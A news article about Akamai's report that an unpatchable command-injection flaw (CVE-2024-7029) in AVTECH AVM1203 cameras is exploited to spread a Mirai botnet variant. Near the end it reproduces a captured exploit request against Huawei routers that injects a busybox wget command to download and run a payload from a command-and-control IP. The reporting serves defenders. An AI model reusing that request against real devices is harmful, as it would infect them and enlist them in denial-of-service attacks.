Unpatchable 0-day version in surveillance camera is exploited to install Mirai

The word ZERO-DAY is hidden in the middle of a screen full of ones and zeros.

Malicious hackers are exploiting a critical vulnerability in a widely used surveillance camera to spread Mirai, a family of malware that injects infected IoT devices into large networks and from there is used to launch attacks that bring down websites and other internet-connected devices.

The attacks target the AVM1203, a surveillance device made by Taiwanese manufacturer AVTECH, network security provider Akamai said on Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, known as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day vulnerability.

Back then, a ragtag army shook the Internet

According to Akamai, attackers are exploiting the vulnerability to install a variant of Mirai. Mirai came to market in September 2016, when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained features that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to carry out distributed denial-of-service attacks of record-breaking scale. In the weeks that followed, the Mirai botnet carried out similar attacks on internet service providers and other targets. One such attack on dynamic domain name provider Dyn brought down large swathes of the internet. To complicate attempts to contain Mirai, its developers released the malware publicly. This allowed virtually anyone to create their own botnets that carried out DDoS attacks of once-unimaginable scale.

Kyle Lefton, a security researcher with Akamai's Security Intelligence and Response Team, said in an email that the attacker behind the attacks has carried out DDoS attacks against “various organizations” that he declined to name or describe. So far, the team has seen no evidence that the attackers are monitoring video feeds or using the infected cameras for other purposes.

Akamai discovered the activity using a “honeypot” of devices that mimic cameras on the open internet to observe any attacks targeting them. This technique did not allow researchers to measure the size of the botnet. The U.S. Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

However, the technique has allowed Akamai to intercept the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019, when the exploit code became public. The zero-day is located in the “brightness argument in the 'action=' parameter” and allows command injection, the researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, was only officially acknowledged this month with the publication of CVE-2024-7029.

Wednesday’s post continued:

How does it work?

This vulnerability was originally discovered while examining our honeypot logs. Figure 1 shows the decoded URL for clarity.
Decoded payload

Fig. 1: Decoded payload body of the exploit attempts
Enlarge / Fig. 1: Decoded payload body of the exploit attempts

Akamai

Fig. 1: Decoded payload body of the exploit attempts

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit
Enlarge / Fig. 2: PoC of the exploit

Akamai

What could happen?

In the exploit examples we observed, this is essentially what happened: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and execute a JavaScript file to retrieve and load its main malware payload. Similar to many other botnets, this one also spreads a variant of the Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader
Enlarge / Fig. 3: Strings from the JavaScript downloader

Akamai

In this case, the botnet is likely using the Corona Mirai variant, which other vendors have already referred to in 2020 in connection with the COVID-19 virus.

When executed, the malware connects to a large number of hosts via Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Malware execution with output on the console
Enlarge / Fig. 4: Malware execution with output on the console

Akamai

Static analysis of the strings in the malware samples shows that the path /ctrlt/DeviceUpgrade_1 is used as a target to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  Content-Length: 430
  Connection: keep-alive
  Accept: */*
  Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

  $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)

The botnet also targeted several other vulnerabilities, including Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities being exploited multiple times in the wild, and they continue to be successful.

Since this camera model is no longer supported, it is best for all users to replace it. As with all internet-connected devices, IoT devices should never be accessible using the default credentials provided.

Leave a Reply